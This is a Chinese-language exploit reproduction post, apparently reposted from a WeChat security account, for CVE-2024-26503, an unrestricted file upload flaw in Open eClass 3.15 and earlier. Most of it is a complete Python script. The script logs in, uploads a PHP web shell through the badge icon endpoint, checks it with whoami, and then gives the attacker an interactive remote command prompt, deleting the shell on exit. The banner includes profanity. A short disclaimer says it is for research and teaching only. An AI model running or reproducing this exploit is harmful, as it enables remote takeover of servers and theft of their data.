漏洞描述
Greek Universities Network Open eClass v.3.15及更早版本中的无限制文件上传漏洞允许攻击者上传恶意文件,从而获取服务器权限。
资产测绘
FOFA:
漏洞复现
python exploit.py -u 'username' -p 'password' -e 'http://'
import requests
import argparse
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RESET = '\033[0m'
ORANGE = '\033[38;5;208m'
def banner():
print(f'''{RED}
___ _ _ ____ ____ __ ____ ___ ____ ___ ___ __ ____
/ __)/ )( \\( __)___(___ \\ / \\(___ \\ / _ \\ ___(___ \\ / __) / __) / \\( __ \\
( (__ \\ \\/ / ) _)(___)/ __/( 0 )/ __/(__ ((___)/ __/( _ \\(___ \\( 0 )(__ (
\\___) \\__/ (____) (____) \\__/(____) (__/ (____) \\___/(____/ \\__/(____/
{YELLOW}
============================ fuck you ============================
{RESET} ''')
def execute_command(openeclass):
while True:
# Prompt for user input with "eclass"
cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")
# Check if the command is 'quit', then break the loop
if cmd.lower() == "quit":
print(f"{ORANGE}\nExiting... removing '{RED}execute.php{ORANGE}'{RESET}")
requests.get(f"{openeclass}/courses/user_progress_data/badge_templates/execute.php?cmd=rm execute.php")
break
# Construct the URL with the user-provided command
url = f"{openeclass}/courses/user_progress_data/badge_templates/execute.php?cmd={cmd}"
# Execute the GET request
try:
response = requests.get(url)
# Check if the request was successful
if response.status_code == 200:
# Print the response text
print(f"{GREEN}{response.text}{RESET}")
except requests.exceptions.RequestException as e:
# Print any error that occurs during the request
print(f"{RED}An error occurred: {e}{RESET}")
def upload_web_shell(openeclass, username, password):
login_url = f'{openeclass}/?login_page=1'
login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'
# Login credentials
payload = {
'next': '/main/portfolio.php',
'uname': f'{username}',
'pass': f'{password}',
'submit': 'Enter'
}
headers = {
'Referer': login_page_url,
}
# Use a session to ensure cookies are handled correctly
with requests.Session() as session:
# (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens
session.get(login_page_url)
# Post the login credentials
response = session.post(login_url, headers=headers, data=payload)
url = f'{openeclass}/modules/admin/certbadge.php'
files = {
'icon': ('execute.php', '<?php echo shell_exec($_GET[\'cmd\']) ;?>', 'text/plain'),
'name': (None, ''),
'description': (None, ''),
'submit_badge_icon': (None, '')
}
response = session.post(url, files=files)
def is_successfull(openeclass):
url = f"{openeclass}/courses/user_progress_data/badge_templates/execute.php?cmd=whoami"
# Execute the GET request
try:
response = requests.get(url)
# Check if the request was successful
if response.status_code == 200:
# Print the response text
return True
else:
print("EXPLOITATION FAILED")
return False
except requests.exceptions.RequestException as e:
# Print any error that occurs during the request
print(f"An error occurred: {e}")
def main():
parser = argparse.ArgumentParser(description="Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution")
parser.add_argument('-u', '--username', required=True, help="Username for login")
parser.add_argument('-p', '--password', required=True, help="Password for login")
parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")
args = parser.parse_args()
banner()
# Running the main login and execute command function
upload_web_shell(args.eclass, args.username, args.password)
if is_successfull(args.eclass) == True :
execute_command(args.eclass)
if __name__ == "__main__":
main()
原文始发于微信公众号(漏洞文库):【漏洞复现】CVE-2024-26503
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论